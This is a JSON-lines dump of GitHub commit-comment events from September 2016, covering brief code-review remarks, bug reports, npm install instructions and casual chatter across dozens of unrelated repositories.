{"id":"4546823601","type":"CommitCommentEvent","actor":{"login":"TecSeguridad"},"repo":{"name":"vitalidze/traccar-web"},"payload":{"comment":{"id":18978902,"position":null,"line":null,"path":null,"commit_id":"7a5196abd5c29fa3f4ad761a58c2c4e7d625507f","created_at":"2016-09-12T00:39:50Z","updated_at":"2016-09-12T00:39:50Z","body":"Hello Vitaly, first congrats for you great Job and Helping. Sorry for my inexperience but i`m learning and already try to resolve the 822 issue by myself. Can you tell me where i get the mapview.java file to fix it?. I decompress traccar-web.war and search in /opt/traccar directory. So i trying to figure it out., and i did not find it. Thank you"}},"created_at":"2016-09-12T00:39:50Z"}
{"id":"4546825626","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18978907,"position":null,"line":null,"path":null,"commit_id":"40dad022f9e6403bd3ca94b92477ef54111d015c","created_at":"2016-09-12T00:41:12Z","updated_at":"2016-09-12T00:41:12Z","body":"@ariel- : you might want to insert a blank line between 35 and 36 in the SQL , both for readability and to avoid any weird behaviour before merging with main branch (github does not apply syntax highlighting to 36)."}},"created_at":"2016-09-12T00:41:12Z"}
{"id":"4546825799","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"babymannen/theforgottenserver-7.4"},"payload":{"comment":{"id":18978908,"position":null,"line":null,"path":null,"commit_id":"9b01f8bb3abe95df0c3c8012a72c6ebe0fed3db3","created_at":"2016-09-12T00:41:20Z","updated_at":"2016-09-12T00:41:20Z","body":"Can you please explain to me what does this code?\r\n**Line 1760:**\r\nif (tile && tile->queryAdd(0, *this, 1, FLAG_PATHFINDING) == RETURNVALUE_NOERROR) {"}},"created_at":"2016-09-12T00:41:20Z"}
{"id":"4546826034","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18978909,"position":null,"line":null,"path":null,"commit_id":"84db27c8f6c27c87e2ce86ac876d73e28cb85bdb","created_at":"2016-09-12T00:41:30Z","updated_at":"2016-09-12T00:41:30Z","body":"This file was missed at [Commit aa5767cccfc508a1](http://github.com/weidai11/cryptopp/commit/aa5767cccfc508a122183a84c746047a679b9c08)."}},"created_at":"2016-09-12T00:41:30Z"}
{"id":"4546826398","type":"CommitCommentEvent","actor":{"login":"dzxx36gyy"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978910,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-12T00:41:45Z","updated_at":"2016-09-12T00:41:45Z","body":"@yaalsn 现在在拿zhjc1123的版本在路由跑(￣▽￣)ノ"}},"created_at":"2016-09-12T00:41:45Z"}
{"id":"4546826925","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18978911,"position":null,"line":null,"path":null,"commit_id":"545f4ae250700057be2bf1d1a6c4cde29bf329d2","created_at":"2016-09-12T00:42:07Z","updated_at":"2016-09-12T00:42:07Z","body":"Related to: backdrop/backdrop-issues#449 "}},"created_at":"2016-09-12T00:42:07Z"}
{"id":"4546828105","type":"CommitCommentEvent","actor":{"login":"wuchangfeng"},"repo":{"name":"JangGwa/weeklyblog"},"payload":{"comment":{"id":18978913,"position":31,"line":31,"path":"phase_3_20160906/janggwa_20160906_优雅地创建和销毁对象.md","commit_id":"c5f0fe4d981acfa24d3cb1f38720967a955fc3e1","created_at":"2016-09-12T00:42:54Z","updated_at":"2016-09-12T00:42:54Z","body":"这个 ** 4. 加粗好像有问题"}},"created_at":"2016-09-12T00:42:54Z"}
{"id":"4546828654","type":"CommitCommentEvent","actor":{"login":"wuchangfeng"},"repo":{"name":"JangGwa/weeklyblog"},"payload":{"comment":{"id":18978914,"position":125,"line":125,"path":"phase_3_20160906/janggwa_20160906_优雅地创建和销毁对象.md","commit_id":"c5f0fe4d981acfa24d3cb1f38720967a955fc3e1","created_at":"2016-09-12T00:43:17Z","updated_at":"2016-09-12T00:43:17Z","body":"代码的缩进问题，前面和后面也注意一下。"}},"created_at":"2016-09-12T00:43:17Z"}
{"id":"4546828851","type":"CommitCommentEvent","actor":{"login":"yaalsn"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978915,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-12T00:43:25Z","updated_at":"2016-09-12T00:43:25Z","body":"@dzxx36gyy 能运行就好。话说我一直以为南苑住的都是妹子。。。"}},"created_at":"2016-09-12T00:43:25Z"}
{"id":"4546830539","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18978917,"position":null,"line":null,"path":null,"commit_id":"c23f9b34318fca9c05115730b49b1818d21fedbf","created_at":"2016-09-12T00:44:32Z","updated_at":"2016-09-12T00:44:32Z","body":"i figured it out. Also, what is all[  ] ? and how can i look it up?\n\nOn Sun, Sep 11, 2016 at 6:25 PM, Ricky C. <notifications@github.com> wrote:\n\n> The first thing is to indent your code properly so it makes it easier on\n> my 👀. The good thing is Atom has an auto indent button!\n>\n> http://stackoverflow.com/questions/22611377/auto-\n> indent-code-in-atom-editor\n>\n> Sometimes when you're stuck, it's good to walk away and come back to the\n> code later. You might realize something you haven't thought of. You're\n> actually very close. I see why Line 90 won't work. For now, I want you to\n> take a break. I'll post an explanation why it won't work later.\n>\n> I would rather you try and get the PR working since it'll help me comment\n> your code better.\n>\n> My suggestion is to make a copy of the files and put it somewhere outside\n> the git repository (folder). Delete the files and commit it to master. Now\n> make a new branch called homework-1 and paste the files back in and commit\n> it to homework-1. Then make a pull request.\n>\n> On Sun, Sep 11, 2016 at 6:17 PM erinl1 <notifications@github.com> wrote:\n>\n> > @rickyc <https://github.com/rickyc> gahh ive tried everything but ive\n> > been stuck bcuz i cant figure out why line 90 isn't working. I even tried\n> > using confidence.\n> >\n> > —\n> > You are receiving this because you were mentioned.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/erinl1/nha-erinlee/commit/\n> c23f9b34318fca9c05115730b49b1818d21fedbf#commitcomment-18978414>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/AAG0kdd4jzxd2zX_\n> f1jGtn4zUinBtq-Iks5qpH4TgaJpZM4J6Htp>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/erinl1/nha-erinlee/commit/c23f9b34318fca9c05115730b49b1818d21fedbf#commitcomment-18978427>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQldnWDPo2TPdK_hOXKfr1meaM91GFFcks5qpH_GgaJpZM4J6Htp>\n> .\n>\n\n\n\n-- \n\nErin Lee\n"}},"created_at":"2016-09-12T00:44:32Z"}
{"id":"4546830850","type":"CommitCommentEvent","actor":{"login":"wuchangfeng"},"repo":{"name":"JangGwa/weeklyblog"},"payload":{"comment":{"id":18978918,"position":230,"line":230,"path":"phase_3_20160906/janggwa_20160906_优雅地创建和销毁对象.md","commit_id":"c5f0fe4d981acfa24d3cb1f38720967a955fc3e1","created_at":"2016-09-12T00:44:45Z","updated_at":"2016-09-12T00:44:45Z","body":"终结方法是 final 方法吗？应该是的。另外结尾结束太突然了点，可以稍微总结一下。讲述下重点以及参考或者引申阅读之类。"}},"created_at":"2016-09-12T00:44:45Z"}
{"id":"4546831515","type":"CommitCommentEvent","actor":{"login":"qinyuhang"},"repo":{"name":"yichengchen/ShadowsocksX-R"},"payload":{"comment":{"id":18978920,"position":22,"line":29,"path":"ShadowsocksX-NG/NetWorkMonitor.swift","commit_id":"b1e9babfb22718dc3b344a8e7f5ab8c1fc32ded4","created_at":"2016-09-12T00:45:11Z","updated_at":"2016-09-12T00:45:11Z","body":"macOS 10.12 Sierra 在这一处 crash 了，signal SIGART，libc++abi.dylib: terminating with uncaught exception of type NSException. 查看苹果的doc，https://developer.apple.com/reference/foundation/runloop/1856119-current 似乎 10.12 以后要把 currentRunLoop 改成 current"}},"created_at":"2016-09-12T00:45:11Z"}
{"id":"4546832236","type":"CommitCommentEvent","actor":{"login":"dzxx36gyy"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978922,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-12T00:45:33Z","updated_at":"2016-09-12T00:45:33Z","body":"@yaalsn ←_←我这全都是汉子，南苑现在有1-9，妹子是有的，只是显然不可能那么多啊"}},"created_at":"2016-09-12T00:45:33Z"}
{"id":"4546832952","type":"CommitCommentEvent","actor":{"login":"qw789"},"repo":{"name":"qw789/hello-world"},"payload":{"comment":{"id":18978923,"position":null,"line":null,"path":null,"commit_id":"b9e9f61f2c93fba27f0fa2cf9681fd8ba49b3d8c","created_at":"2016-09-12T00:46:03Z","updated_at":"2016-09-12T00:46:03Z","body":"xxxxx"}},"created_at":"2016-09-12T00:46:03Z"}
{"id":"4546839782","type":"CommitCommentEvent","actor":{"login":"codingdarren"},"repo":{"name":"fayfays/devtools"},"payload":{"comment":{"id":18978930,"position":null,"line":null,"path":null,"commit_id":"05dc95c52bbf43af93033cd0715d3c82b52d8981","created_at":"2016-09-12T00:50:26Z","updated_at":"2016-09-12T00:50:26Z","body":"Hello\r\n"}},"created_at":"2016-09-12T00:50:26Z"}
{"id":"4546839806","type":"CommitCommentEvent","actor":{"login":"invincibleqc"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":18978931,"position":5,"line":14,"path":"resource/source-python/translations/_core/hooks_strings.ini","commit_id":"3113e770a9ec3a71f7f1df5d42b87b674ed09c6a","created_at":"2016-09-12T00:50:28Z","updated_at":"2016-09-12T00:50:28Z","body":"Yeah, I only added the missing quotes to fix loading errors, didn't check the translated strings at all and that space was already there. I don't believe it bother to print something with a trailing space, but I will remove it shortly, thank you."}},"created_at":"2016-09-12T00:50:28Z"}
{"id":"4546845524","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18978946,"position":null,"line":null,"path":null,"commit_id":"7f1beaf720bfb67efb00a9a5b5e27e8fc8041216","created_at":"2016-09-12T00:54:18Z","updated_at":"2016-09-12T00:54:18Z","body":"Related to: backdrop/backdrop-issues#1152 "}},"created_at":"2016-09-12T00:54:18Z"}
{"id":"4546845528","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18978947,"position":null,"line":null,"path":null,"commit_id":"af00994a79dc08b3d96b58d78677c6e5ffe199ba","created_at":"2016-09-12T00:54:18Z","updated_at":"2016-09-12T00:54:18Z","body":"Related to: backdrop/backdrop-issues#1152 "}},"created_at":"2016-09-12T00:54:18Z"}
{"id":"4546845532","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18978948,"position":null,"line":null,"path":null,"commit_id":"c4543a45f2d9858929d42cfd3988adb05eaa5224","created_at":"2016-09-12T00:54:18Z","updated_at":"2016-09-12T00:54:18Z","body":"Related to: backdrop/backdrop-issues#1152 "}},"created_at":"2016-09-12T00:54:18Z"}
{"id":"4546845944","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"mbootsector/Stockfish"},"payload":{"comment":{"id":18978953,"position":null,"line":null,"path":null,"commit_id":"afbe6ac597dfb2bb7ce9203e62b7ed637bd7a935","created_at":"2016-09-12T00:54:33Z","updated_at":"2016-09-12T00:54:33Z","body":"Weird results...this is a clear +10 elo patch in my machine!!"}},"created_at":"2016-09-12T00:54:33Z"}
{"id":"4546847181","type":"CommitCommentEvent","actor":{"login":"stilor"},"repo":{"name":"crosstool-ng/crosstool-ng"},"payload":{"comment":{"id":18978954,"position":null,"line":null,"path":null,"commit_id":"f64f561e6f5aee05ae93af7443e144453fe31700","created_at":"2016-09-12T00:55:19Z","updated_at":"2016-09-12T00:55:19Z","body":"I'd still mention why --with-libexpat-prefix=<location of the cross expat library> does not work - old comment explained how that breaks static builds - we've already had that done once.\r\n\r\nOther than that, thanks for the explanation. I am still a bit surprised that it looks at $prefix/lib rather than at ${CT_SYSROOT_DIR}$prefix/lib - after all, we do pass ${CT_SYSROOT_DIR} as the build sysroot. Having seen gdb's configure stupidity at using libexpat prefix, however, I could dismiss the possibility that gdb's configure is buggy though.\r\n\r\nSo, am I right that the test case is to place a bogus libexpat.so into host's /usr/lib?"}},"created_at":"2016-09-12T00:55:19Z"}
{"id":"4546848213","type":"CommitCommentEvent","actor":{"login":"stilor"},"repo":{"name":"crosstool-ng/crosstool-ng"},"payload":{"comment":{"id":18978957,"position":null,"line":null,"path":null,"commit_id":"f64f561e6f5aee05ae93af7443e144453fe31700","created_at":"2016-09-12T00:55:59Z","updated_at":"2016-09-12T00:55:59Z","body":"(I might have a look at gdb's configure later - I want to know what test case was manifesting this bug)"}},"created_at":"2016-09-12T00:55:59Z"}
{"id":"4546851530","type":"CommitCommentEvent","actor":{"login":"Parkayun"},"repo":{"name":"Flative/flative.github.io"},"payload":{"comment":{"id":18978964,"position":27,"line":27,"path":"_posts/2016-09-11-like-aws.md","commit_id":"b28c7a94159d940d7b685b674bf4aee2fbdd5d98","created_at":"2016-09-12T00:58:07Z","updated_at":"2016-09-12T00:58:07Z","body":"Seems typo in here @leejaedus "}},"created_at":"2016-09-12T00:58:07Z"}
{"id":"4546852827","type":"CommitCommentEvent","actor":{"login":"Tee7even"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":18978970,"position":null,"line":null,"path":null,"commit_id":"7911d6c0856d68833ee90d3a02e89df35246eea5","created_at":"2016-09-12T00:58:56Z","updated_at":"2016-09-12T00:58:56Z","body":"@minecrafter there is. It's just a tap on touch devices and a normal right click on PCs. "}},"created_at":"2016-09-12T00:58:56Z"}
{"id":"4546854188","type":"CommitCommentEvent","actor":{"login":"leejaedus"},"repo":{"name":"Flative/flative.github.io"},"payload":{"comment":{"id":18978973,"position":27,"line":27,"path":"_posts/2016-09-11-like-aws.md","commit_id":"b28c7a94159d940d7b685b674bf4aee2fbdd5d98","created_at":"2016-09-12T00:59:51Z","updated_at":"2016-09-12T00:59:51Z","body":"Please check recent commit"}},"created_at":"2016-09-12T00:59:51Z"}
{"id":"4546854804","type":"CommitCommentEvent","actor":{"login":"Parkayun"},"repo":{"name":"Flative/flative.github.io"},"payload":{"comment":{"id":18978975,"position":27,"line":27,"path":"_posts/2016-09-11-like-aws.md","commit_id":"b28c7a94159d940d7b685b674bf4aee2fbdd5d98","created_at":"2016-09-12T01:00:13Z","updated_at":"2016-09-12T01:00:13Z","body":"😉 "}},"created_at":"2016-09-12T01:00:13Z"}
{"id":"4546855739","type":"CommitCommentEvent","actor":{"login":"minecrafter"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":18978977,"position":null,"line":null,"path":null,"commit_id":"7911d6c0856d68833ee90d3a02e89df35246eea5","created_at":"2016-09-12T01:00:39Z","updated_at":"2016-09-12T01:00:39Z","body":"@Tee7even Sorry, I'm too stuck on mobile. I'm not even at that point anyway (need to figure out the packets for that)."}},"created_at":"2016-09-12T01:00:39Z"}
{"id":"4546867420","type":"CommitCommentEvent","actor":{"login":"Quiqui64"},"repo":{"name":"Quiqui64/Smartthings-Alarm"},"payload":{"comment":{"id":18979000,"position":null,"line":null,"path":null,"commit_id":"b73f2fa06a764fcb03541d7cd93aaeeb96f8aa77","created_at":"2016-09-12T01:07:44Z","updated_at":"2016-09-12T01:07:44Z","body":"delete"}},"created_at":"2016-09-12T01:07:44Z"}
{"id":"4546868824","type":"CommitCommentEvent","actor":{"login":"minecrafter"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":18979003,"position":null,"line":null,"path":null,"commit_id":"7911d6c0856d68833ee90d3a02e89df35246eea5","created_at":"2016-09-12T01:08:37Z","updated_at":"2016-09-12T01:08:37Z","body":"Looking a little further into this, `McpeUseItem` implements right-clicking behavior. Sorry for that, I'm too tied up at the moment."}},"created_at":"2016-09-12T01:08:37Z"}
{"id":"4546876525","type":"CommitCommentEvent","actor":{"login":"Kingziqiang"},"repo":{"name":"Kingziqiang/Do-own-hereo-"},"payload":{"comment":{"id":18979013,"position":3,"line":3,"path":"README.md","commit_id":"24fc759779dd129b995a3aa3b63dc6a8e94964c0","created_at":"2016-09-12T01:12:59Z","updated_at":"2016-09-12T01:12:59Z","body":"不错\r\n"}},"created_at":"2016-09-12T01:12:59Z"}
{"id":"4546877550","type":"CommitCommentEvent","actor":{"login":"snowcxt"},"repo":{"name":"ronzeidman/ng2-ui-auth"},"payload":{"comment":{"id":18979021,"position":6,"line":118,"path":"src/config.ts","commit_id":"67205663ea35b95cc258c0f0756eb23b682018af","created_at":"2016-09-12T01:13:33Z","updated_at":"2016-09-12T01:13:33Z","body":"Should change facebook as well"}},"created_at":"2016-09-12T01:13:33Z"}
{"id":"4546881756","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18979026,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T01:15:55Z","updated_at":"2016-09-12T01:15:55Z","body":"Or, maybe it's like our class! ONLY ONE GIRL! (Watch out, I have a break between 1st and 2nd!)"}},"created_at":"2016-09-12T01:15:55Z"}
{"id":"4546883356","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18979027,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T01:16:50Z","updated_at":"2016-09-12T01:16:50Z","body":"(Sorry about te delay there)"}},"created_at":"2016-09-12T01:16:50Z"}
{"id":"4546884222","type":"CommitCommentEvent","actor":{"login":"sa-inu"},"repo":{"name":"sa-inu/Angular2-practice"},"payload":{"comment":{"id":18979029,"position":null,"line":null,"path":null,"commit_id":"65a30afd9bd5fe76abb8303cc3f71c1bf69858a1","created_at":"2016-09-12T01:17:16Z","updated_at":"2016-09-12T01:17:16Z","body":"execute `npm i -D typescript@1.8.10` command"}},"created_at":"2016-09-12T01:17:16Z"}
{"id":"4546889939","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18979042,"position":null,"line":null,"path":null,"commit_id":"8937b558a7facd6c558772547cfb172a062e4057","created_at":"2016-09-12T01:20:28Z","updated_at":"2016-09-12T01:20:28Z","body":"@MichaelWallace30 \r\nUghhhhhhhhhh, why does 2012-2013 have trouble with lambda expression arguments, but 2015 has no problem.............."}},"created_at":"2016-09-12T01:20:28Z"}
{"id":"4546895023","type":"CommitCommentEvent","actor":{"login":"sa-inu"},"repo":{"name":"sa-inu/Angular2-practice"},"payload":{"comment":{"id":18979054,"position":null,"line":null,"path":null,"commit_id":"353469b31caba445673f5cc6e3c5b33566f686a7","created_at":"2016-09-12T01:23:17Z","updated_at":"2016-09-12T01:23:17Z","body":"You should execute following commands\r\n\r\n1. `npm i -D typings@1.0.4`\r\n2. `$(npm bin)/typings install --global --save dt~core-js`"}},"created_at":"2016-09-12T01:23:17Z"}
{"id":"4546897709","type":"CommitCommentEvent","actor":{"login":"sa-inu"},"repo":{"name":"sa-inu/Angular2-practice"},"payload":{"comment":{"id":18979067,"position":null,"line":null,"path":null,"commit_id":"8638dc3a917d880e2475ec1cbdef5f62280d05d1","created_at":"2016-09-12T01:24:48Z","updated_at":"2016-09-12T01:24:48Z","body":"execute `npm i -D ts-loader@0.8.2 webpack@1.13.1` command"}},"created_at":"2016-09-12T01:24:48Z"}
{"id":"4546899292","type":"CommitCommentEvent","actor":{"login":"sa-inu"},"repo":{"name":"sa-inu/Angular2-practice"},"payload":{"comment":{"id":18979071,"position":null,"line":null,"path":null,"commit_id":"70208cd7d3b6a12f1797703a6b8ccd453945cc2c","created_at":"2016-09-12T01:25:39Z","updated_at":"2016-09-12T01:25:39Z","body":"execute `npm i -D html-webpack-plugin@2.17.0` command"}},"created_at":"2016-09-12T01:25:39Z"}
{"id":"4546900793","type":"CommitCommentEvent","actor":{"login":"sa-inu"},"repo":{"name":"sa-inu/Angular2-practice"},"payload":{"comment":{"id":18979073,"position":null,"line":null,"path":null,"commit_id":"1fee7f9a8f7f5fac99fe0a56aa4942146299fa05","created_at":"2016-09-12T01:26:27Z","updated_at":"2016-09-12T01:26:27Z","body":"execute `npm i -D webpack-dev-server@1.14.1` command"}},"created_at":"2016-09-12T01:26:27Z"}
{"id":"4546901458","type":"CommitCommentEvent","actor":{"login":"matwu1006"},"repo":{"name":"NickWu007/Caterpillars-Count-Mobile-2016"},"payload":{"comment":{"id":18979075,"position":null,"line":null,"path":null,"commit_id":"6c70a658f2ecd2d992ba774555b2bcefa51b0741","created_at":"2016-09-12T01:26:50Z","updated_at":"2016-09-12T01:26:50Z","body":"Looks good"}},"created_at":"2016-09-12T01:26:50Z"}
{"id":"4546902888","type":"CommitCommentEvent","actor":{"login":"zazaviza"},"repo":{"name":"IbnB/PrivacySensSys"},"payload":{"comment":{"id":18979080,"position":null,"line":null,"path":null,"commit_id":"96aa2cee336d7ff80cf6c79fb4d9922112630e56","created_at":"2016-09-12T01:27:37Z","updated_at":"2016-09-12T01:27:37Z","body":"..."}},"created_at":"2016-09-12T01:27:37Z"}
{"id":"4546903355","type":"CommitCommentEvent","actor":{"login":"jessegross"},"repo":{"name":"openvswitch/ovs"},"payload":{"comment":{"id":18979082,"position":null,"line":null,"path":null,"commit_id":"67762449ecbf282f0667fa8b31df68602a497619","created_at":"2016-09-12T01:27:51Z","updated_at":"2016-09-12T01:27:51Z","body":"Thanks for pointing that out. I sent out a patch to fix it:\r\nhttp://openvswitch.org/pipermail/dev/2016-September/079351.html"}},"created_at":"2016-09-12T01:27:51Z"}
{"id":"4546903380","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18979083,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T01:27:52Z","updated_at":"2016-09-12T01:27:52Z","body":"Are you talking about our CSE class?\n\n> On Sep 11, 2016, at 9:15 PM, Zacharý <notifications@github.com> wrote:\n> \n> Or, maybe it's like our class! ONLY ONE GIRL! (Watch out, I have a break between 1st and 2nd!)\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-12T01:27:52Z"}
{"id":"4546905121","type":"CommitCommentEvent","actor":{"login":"zazaviza"},"repo":{"name":"IbnB/PrivacySensSys"},"payload":{"comment":{"id":18979085,"position":1,"line":1,"path":".idea/.name","commit_id":"1ce49fde5b5eaca3b61ec91a1356559744b5ce64","created_at":"2016-09-12T01:28:48Z","updated_at":"2016-09-12T01:28:48Z","body":"Wifi"}},"created_at":"2016-09-12T01:28:48Z"}
{"id":"4546905410","type":"CommitCommentEvent","actor":{"login":"sunilkumarvuppala"},"repo":{"name":"sunilkumarvuppala/AndroidProjects"},"payload":{"comment":{"id":18979086,"position":null,"line":null,"path":null,"commit_id":"2bbb78c7b35e32e818421c8b033ee4093ab086b2","created_at":"2016-09-12T01:28:57Z","updated_at":"2016-09-12T01:28:57Z","body":"Android Projects"}},"created_at":"2016-09-12T01:28:57Z"}
{"id":"4546906387","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18979090,"position":null,"line":null,"path":null,"commit_id":"6b8130d54d17ca9b6e4e047b6f8da15c3d88a8da","created_at":"2016-09-12T01:29:28Z","updated_at":"2016-09-12T01:29:28Z","body":"@jef-n thanks, that would have been on my to do list if I had one ;) next step is to vectorize the ones that don't have a svg version yet."}},"created_at":"2016-09-12T01:29:28Z"}
{"id":"4546906922","type":"CommitCommentEvent","actor":{"login":"Vaelatern"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18979092,"position":null,"line":null,"path":null,"commit_id":"e6e095b76f3faaf61e09445aee2cdd949b6993bb","created_at":"2016-09-12T01:29:48Z","updated_at":"2016-09-12T01:29:48Z","body":"#4572 "}},"created_at":"2016-09-12T01:29:48Z"}
{"id":"4546907231","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18979093,"position":null,"line":null,"path":null,"commit_id":"282a34b5d81cc7ca6b5dde083d38b144d849c821","created_at":"2016-09-12T01:29:57Z","updated_at":"2016-09-12T01:29:57Z","body":"タイトル的には\r\n「OpenFlow パーサのバージョン表記を減らします」\r\nとかでしょうか？"}},"created_at":"2016-09-12T01:29:57Z"}
{"id":"4546907538","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18979095,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T01:30:07Z","updated_at":"2016-09-12T01:30:07Z","body":"I'm hoping his is like ours so I can find out who he's flirting with."}},"created_at":"2016-09-12T01:30:07Z"}
{"id":"4546912681","type":"CommitCommentEvent","actor":{"login":"xystz"},"repo":{"name":"botanio/sdk"},"payload":{"comment":{"id":18979108,"position":37,"line":37,"path":"botan_async.py","commit_id":"de4d0d7a02ddc25bcbb0945e4b83eb14110ff8ae","created_at":"2016-09-12T01:32:40Z","updated_at":"2016-09-12T01:32:40Z","body":"fffffffffffff"}},"created_at":"2016-09-12T01:32:40Z"}
{"id":"4546913684","type":"CommitCommentEvent","actor":{"login":"ethn"},"repo":{"name":"wagn/wagn"},"payload":{"comment":{"id":18979110,"position":5,"line":128,"path":"card/mod/pointer/set/abstract/01_pointer.rb","commit_id":"cd8078eaf6a77b844d2c95d70081f4237a9a20cc","created_at":"2016-09-12T01:33:12Z","updated_at":"2016-09-12T01:33:12Z","body":"ah, ok.  I was seeing that error message.  "}},"created_at":"2016-09-12T01:33:12Z"}
{"id":"4546916237","type":"CommitCommentEvent","actor":{"login":"wppd"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":18979115,"position":null,"line":null,"path":null,"commit_id":"0efdd8080721b5288f086b8c7d6bd8bce4f4af5a","created_at":"2016-09-12T01:34:28Z","updated_at":"2016-09-12T01:34:28Z","body":"this bug fix raise another issue:\r\n\r\nv-for on an dynamic array `[{title: \"hello\", quantity: 1}, {title: \"world\", quantity : 1 }]`\r\n\r\nwhen `<input type=\"number\" v-model=\"item.quantity\" />`, when change the numbers, and on blur, it'll reset to its initial state, in this case, 1.\r\n\r\nwill make a demo and submit an issue for this."}},"created_at":"2016-09-12T01:34:28Z"}
{"id":"4546922621","type":"CommitCommentEvent","actor":{"login":"MAL315"},"repo":{"name":"super3/peercoin.net"},"payload":{"comment":{"id":18979128,"position":null,"line":null,"path":null,"commit_id":"e06fe9356cb5d701f2798fe89a959cdcacce0c10","created_at":"2016-09-12T01:37:58Z","updated_at":"2016-09-12T01:37:58Z","body":"I managed to get the PNG uploaded in the pull request, you can ignore imgur link above."}},"created_at":"2016-09-12T01:37:58Z"}
{"id":"4546938061","type":"CommitCommentEvent","actor":{"login":"Blanckaert"},"repo":{"name":"Ludovicus/WoW-Pro-Guides"},"payload":{"comment":{"id":18979152,"position":null,"line":null,"path":null,"commit_id":"b644dc79f9b223b2756b5f8cd231d27f0a9a8bed","created_at":"2016-09-12T01:46:07Z","updated_at":"2016-09-12T01:46:07Z","body":"WoWPro.why[k] = \"NextStep(): Skipping step because player level not high enough\r\nShouldn't this read, Player Level is too high ?  ;)"}},"created_at":"2016-09-12T01:46:07Z"}
{"id":"4546945119","type":"CommitCommentEvent","actor":{"login":"Harmon758"},"repo":{"name":"Shizmob/pydle"},"payload":{"comment":{"id":18979156,"position":null,"line":null,"path":null,"commit_id":"311c723ef00595732791ebd07474bec0ee842dfc","created_at":"2016-09-12T01:49:36Z","updated_at":"2016-09-12T01:49:36Z","body":"I don't seem to be having any exceptions show up at all in coroutines, even when I know one has occurred."}},"created_at":"2016-09-12T01:49:36Z"}
{"id":"4546947616","type":"CommitCommentEvent","actor":{"login":"huayi"},"repo":{"name":"junjun1092/beego-blog"},"payload":{"comment":{"id":18979158,"position":null,"line":null,"path":null,"commit_id":"bbf4c92bac6de6122afeba1132ae34ca5b728bea","created_at":"2016-09-12T01:50:48Z","updated_at":"2016-09-12T01:50:48Z","body":">在声明变量的时候，只有类型是struct的才能用：=的方式来声明和赋值；\r\n>如果是其他基本类型，比如int，或者由int延伸出去的变量，就只能先var a；然后再给a赋值；  \r\n\r\n这句话有点问题, int类型的变量也可以用 `:=` 来赋值, 比如:\r\n``` go\r\nfor i:=0; i<10; i++ {\r\n    //在这个for循环中, 变量`i`就是`int`类型的, 它可以被 := 赋值\r\n}\r\nstr := \"hello world\" //这个string类型的变量也可以被 := 赋值\r\n```"}},"created_at":"2016-09-12T01:50:48Z"}
